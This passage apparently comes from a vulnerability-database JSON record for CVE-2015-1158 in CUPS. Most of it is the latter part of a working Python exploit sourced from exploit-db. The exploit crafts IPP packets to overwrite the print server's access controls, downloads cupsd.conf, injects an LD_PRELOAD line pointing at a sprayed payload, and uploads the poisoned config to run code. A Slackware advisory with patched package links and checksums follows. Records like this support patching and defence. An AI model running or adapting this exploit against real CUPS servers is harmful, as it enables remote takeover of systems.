\"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x16\" # val len: 22\r\n \"\\x00\\x06\" # length\r\n \"/admin\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n\r\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+2)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 
1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x1b\" # val len: 27\r\n \"\\x00\\x0b\" # length\r\n \"/admin/conf\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n\r\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: 
application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n pretty(\"*\",\"stomping ACL\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\r\n time.sleep(1)\r\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\r\n\r\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"checking /admin\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\r\n res = txrx(rhost,rport,\"tcp\",http_header_check)\r\n pretty(\"*\",\"<:\\n\" + createDump(res))\r\n m = re.search('200 OK', res)\r\n if m is not None:\r\n pretty(\"+\",\"ACL stomp successful\")\r\n else:\r\n pretty(\"-\",\"exploit failed\")\r\n exit(1)\r\n\r\n\r\ndef getConfig(rhost, rport):\r\n i = random.randint(1,1024)\r\n original_config = \"\"\r\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n pretty(\"*\",\"grabbing configuration file....\")\r\n res = txrx(rhost,rport,\"tcp\",http_request)\r\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\r\n original_config = res_array[1]\r\n pretty(\"*\",\"config:\\n\" + original_config + \"\\n\")\r\n return original_config\r\n\r\ndef putConfig(rhost, rport, config):\r\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + 
rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Keep-Alive\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"overwriting config...\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\r\n\r\ndef poisonConfig(config, name):\r\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\"\r\n return config\r\n\r\ndef main():\r\n rhost = None;\r\n noshell = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n elif opt in ('-c','--lib'):\r\n libpath = arg;\r\n elif opt in ('-f','--stomp-only'):\r\n noshell = 1;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n pretty(\"*\",\"locate available printer\")\r\n printer = locatePrinters(rhost, rport)\r\n pretty(\"*\",\"stomp ACL\")\r\n stompACL(rhost, rport, printer)\r\n if (noshell is not None):\r\n pretty(\"*\",\"fin\")\r\n exit(0)\r\n pretty(\"*\",\"prepare payload\")\r\n payload = preparePayload(libpath)\r\n pretty(\"*\",\"spray payload\")\r\n jobid = seedTarget(rhost, rport, printer, payload)\r\n pretty(\"*\",\"grab original config\")\r\n OG_config = getConfig(rhost, rport)\r\n pretty(\"*\",\"generate poison config\")\r\n evil_config = poisonConfig(OG_config, jobid)\r\n pretty(\"*\",\"upload poison config\")\r\n putConfig(rhost, rport, evil_config)\r\n pretty(\"*\",\"fin\")\r\n exit(0);\r\n\r\nif __name__ == \"__main__\":\r\n main()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41233/"}], "slackware": [{"lastseen": 
"2020-10-25T16:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158"], "description": "New cups packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/cups-1.5.4-i486-4_slack14.1.txz: Rebuilt.\n This release fixes a security issue:\n CWE-911: Improper Update of Reference Count - CVE-2015-1158\n This bug could allow an attacker to upload a replacement CUPS\n configuration file and mount further attacks.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/cups-1.3.11-i486-3_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/cups-1.3.11-x86_64-3_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/cups-1.4.5-i486-3_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/cups-1.4.5-x86_64-3_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/cups-1.4.6-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/cups-1.4.6-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/cups-1.5.4-i486-3_slack14.0.txz\n\nUpdated package for 
Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/cups-1.5.4-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/cups-1.5.4-i486-4_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/cups-1.5.4-x86_64-4_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/cups-2.0.3-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/cups-2.0.3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nf013abe1761fb1a3a962ee6bb63bb12c cups-1.3.11-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n88c5e1cf46eab8fd0d101e8411f10251 cups-1.3.11-x86_64-3_slack13.0.txz\n\nSlackware 13.1 package:\nf71f2b3066f4af9c407df75b1535f179 cups-1.4.5-i486-3_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n2bf27108c7c2772e8adbd984efb0c55e cups-1.4.5-x86_64-3_slack13.1.txz\n\nSlackware 13.37 package:\n0db4e57246873b1817f7332f90dd245f cups-1.4.6-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n8d3ce5ec82218ebb001c0b46d891895a cups-1.4.6-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\nc9130b507a69775f68eb1ca71c2c746c cups-1.5.4-i486-3_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ne91436f9885350bc63a2d9484f974e66 cups-1.5.4-x86_64-3_slack14.0.txz\n\nSlackware 14.1 package:\ne7887e9c90b7501edca14157a85f7c3c cups-1.5.4-i486-4_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n712faf20c729a442d6229de6942aefc5 cups-1.5.4-x86_64-4_slack14.1.txz\n\nSlackware -current package:\nb92d4ad6d8da3487ca0445915ef6aa38 ap/cups-2.0.3-i486-1.txz\n\nSlackware x86_64 -current package:\nf740e4376110c797ef1926d5a94bea5a ap/cups-2.0.3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg 
cups-1.5.4-i486-4_slack14.1.txz\n\nThen, restart the cups server:\n > sh /etc/rc.d/rc.cups restart", "modified": "2015-07-08T00:00:21", "published": "2015-07-08T00:00:21", "id": "SSA-2015-188-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.507395", "type": "slackware", "title": "[slackware-security] cups", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}